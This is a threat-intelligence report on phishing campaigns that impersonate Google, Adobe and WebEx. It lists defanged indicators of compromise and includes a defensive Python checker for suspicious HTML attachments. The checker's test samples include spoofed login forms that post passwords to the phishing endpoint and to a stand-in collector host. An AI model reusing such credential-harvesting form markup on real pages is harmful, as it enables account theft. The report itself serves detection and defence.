Overview: Latest Phishing Campaigns Impersonating Common Applications
This report is an overview of recent phishing campaigns targeting Google, Adobe and WebEx. Phishing is one of the most common initial attack vectors for malware, including ransomware like Ryuk.
Tactics, Techniques, and Procedures
Research by Armorblox reveals a pattern in which bad actors use services like Google Forms, Google Docs and Firebase to host phishing content. As is common in phishing attacks, these emails impersonate legitimate companies and authorities to pressure users into action. One of the emails analyzed directed users to a Google Form impersonating the well-known Microsoft sign-in page. Because the links are generated through these legitimate Google services, they allow phishing emails to evade security controls.
[Figure: example of a benefactor scam email with a Google Form link]

Separately, anti-phishing solution provider Cofense uncovered an increase in phishing campaigns impersonating Adobe Document Cloud and Cisco WebEx. WebEx is a common service impersonated in phishing campaigns.
In the attack observed by Cofense, the domains “hxxp://eliteddi[.]com” and “hxxp://idbrokerwebex[.]com” were used to host convincing content impersonating a WebEx meeting invitation.
The Adobe attacks come with an attached HTML document housing a spoofed Adobe Document Cloud login form, which sends data to “infiniteworks[.]net/IDI/high.php.” Upon further investigation of the domain, we uncovered additional phishing URLs impersonating Adobe, Lloyds Banking Group and Google within the IDI directory. The website is hosted through BlueHost, running a WordPress installation with the default “Twenty Seventeen” theme.
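A mail-gateway style check for the HTML attachment technique described above, as an added example that is not code from Avertium, Cofense or Armorblox: it parses an attachment, finds forms that post to a network host, and flags them when the host is one of this report's IOC domains or when the form carries a password field. The sample documents, the `hxxp` scheme on the infiniteworks URL, the field names and `collector.example` are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

def refang(text):
    """Undo the report's defanging (hxxp, [.]) so values can be compared."""
    return text.replace("hxxp", "http").replace("[.]", ".")

# Domains from this report's IOC list.
IOC_DOMAINS = {refang(d) for d in
               ("infiniteworks[.]net", "eliteddi[.]com", "idbrokerwebex[.]com")}

class FormAudit(HTMLParser):
    """Record each form's action and whether it contains a password input."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "password": False})
        elif tag == "input" and self.forms and (a.get("type") or "").lower() == "password":
            self.forms[-1]["password"] = True

def is_ioc_host(host):
    """Match an IOC domain or any of its subdomains, never a lookalike suffix."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)

def audit_attachment(html):
    """Return (host, verdict) for every form that posts to a network host."""
    parser = FormAudit()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        host = urlparse(form["action"].strip()).hostname
        if not host:
            continue  # relative action: the data stays inside the local document
        if is_ioc_host(host):
            findings.append((host, "known-ioc"))
        elif form["password"]:
            findings.append((host, "remote-credential-post"))
    return findings

# Constructed samples; the URL scheme and field names are assumptions.
SPOOFED = refang('<form method="post" action="hxxp://infiniteworks[.]net/IDI/high.php">'
                 '<input type="email" name="u"><input type="password" name="p"></form>')
UNKNOWN = '<form action="https://collector.example/login"><input type="PASSWORD" name="p"></form>'
BENIGN = '<form action="#search"><input type="text" name="q"></form>'
```

The second verdict matters once the listed domains are rotated: an HTML file opened from an email has no legitimate reason to send a password field to a remote host, so the check still fires on infrastructure that is not yet in any IOC list.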


Business Unit Impact
- May lead to compromised user accounts and unauthorized access to data and systems
- May provide malicious actors a foothold within your network to be used for lateral movement
Recommendations
- Provide users with training on best practices to avoid phishing, as well as awareness of recent trends in phishing campaigns
- Implement MFA for users and services
- Block provided IOCs
Indicators of Compromise (IOC)
- infiniteworks[.]net
- eliteddi[.]com
- idbrokerwebex[.]com
- 70[.]40[.]220[.]123
- 192[.]185[.]214[.]103
- 216[.]172[.]161[.]34
Sources
- https://www.armorblox.com/blog/ok-google-build-me-a-phishing-campaign/
- https://cofense.com/online-leader-invites-you-to-this-webex-phish/
- https://cofense.com/document-sharing-services-represent-a-vector-for-phishing-campaigns/
Supporting Documentation:
- MITRE Mapping(s)
- Initial Access: https://attack.mitre.org/tactics/TA0001/
- Phishing: https://attack.mitre.org/techniques/T1566/
Note: The Avertium Threat Report analyzes one current threat that has been shared by threat intelligence networks across the globe. Used internally by the Avertium CyberOps Team, this report will outline a “top-of-mind” threat and how it ought to be addressed accordingly.
This informed analysis is based on the latest data available.